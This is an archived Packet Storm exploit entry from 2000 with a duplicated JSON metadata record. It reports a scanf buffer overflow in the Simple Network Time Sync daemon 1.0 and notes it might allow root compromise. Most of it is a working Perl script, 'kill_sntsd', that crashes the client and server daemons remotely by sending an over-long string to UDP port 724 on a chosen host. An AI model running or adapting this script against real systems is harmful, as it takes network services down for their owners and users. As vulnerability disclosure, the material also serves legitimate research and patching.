ID PACKETSTORM:22006 Type packetstorm Reporter Ben Taylor Modified 2000-06-01T00:00:00
Description
`I noticed an uncommon scanf overflow in the Simple Network Time Sync daemon
and client version 1.0, tested on Redhat 6.1. I haven't looked into this
fully yet, but it looks as tho it could be root comprimising as it sits on a
priveledged udp port and seems to coredump, but looks like it only gives you
50 chars to run code with. I have included some perl here which will crash
it remotely by sending it a string over 50 chars.
---------------------------------------
#!/usr/bin/perl -w
#
# Usage: ./kill_sntsd <hostname>
#
use Socket;
send_packet(); # Needs to send 2 packets to kill the client and the server
daemons
send_packet();
sub send_packet {
$proto = getprotobyname('udp');
$localaddr = gethostbyname("localhost") || die "error: $!\n";
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";
$sin = sockaddr_in(724, $iaddr);
$paddr = sockaddr_in(53, $localaddr);
socket(SH, PF_INET, SOCK_DGRAM, $proto);
bind(SH, $paddr);
$|=1;
connect(SH, $sin) || die "$!\n";
# A string longer than 50 characters...
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";
close(SH);
}
---------------------------------------
logistix
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
`
{"id": "PACKETSTORM:22006", "type": "packetstorm", "bulletinFamily": "exploit", "title": "kill_sntsd.pl", "description": "", "published": "2000-06-01T00:00:00", "modified": "2000-06-01T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/22006/kill_sntsd.pl.html", "reporter": "Ben Taylor", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:29:20", "viewCount": 1, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:29:20", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:20", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/22006/kill_sntsd.pl", "sourceData": "`I noticed an uncommon scanf overflow in the Simple Network Time Sync daemon \nand client version 1.0, tested on Redhat 6.1. I haven't looked into this \nfully yet, but it looks as tho it could be root comprimising as it sits on a \npriveledged udp port and seems to coredump, but looks like it only gives you \n50 chars to run code with. I have included some perl here which will crash \nit remotely by sending it a string over 50 chars. \n \n--------------------------------------- \n \n#!/usr/bin/perl -w \n# \n# Usage: ./kill_sntsd <hostname> \n# \n \nuse Socket; \n \nsend_packet(); # Needs to send 2 packets to kill the client and the server \ndaemons \nsend_packet(); \n \nsub send_packet { \n \n$proto = getprotobyname('udp'); \n$localaddr = gethostbyname(\"localhost\") || die \"error: $!\\n\"; \n$iaddr = gethostbyname($ARGV[0]) || die \"$!\\n\"; \n$sin = sockaddr_in(724, $iaddr); \n$paddr = sockaddr_in(53, $localaddr); \nsocket(SH, PF_INET, SOCK_DGRAM, $proto); \nbind(SH, $paddr); \n \n$|=1; \n \nconnect(SH, $sin) || die \"$!\\n\"; \n \n# A string longer than 50 characters... \nprint SH \"logistixlogistixlogistixlogistixlogistixlogistixlogistix\\n\"; \nclose(SH); \n \n} \n \n--------------------------------------- \n \nlogistix \n________________________________________________________________________ \nGet Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com \n \n`\n"}